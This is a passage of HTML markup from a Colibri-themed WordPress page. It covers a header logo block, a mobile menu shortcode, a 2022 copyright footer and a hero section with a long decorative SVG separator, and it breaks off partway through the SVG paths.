     <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path 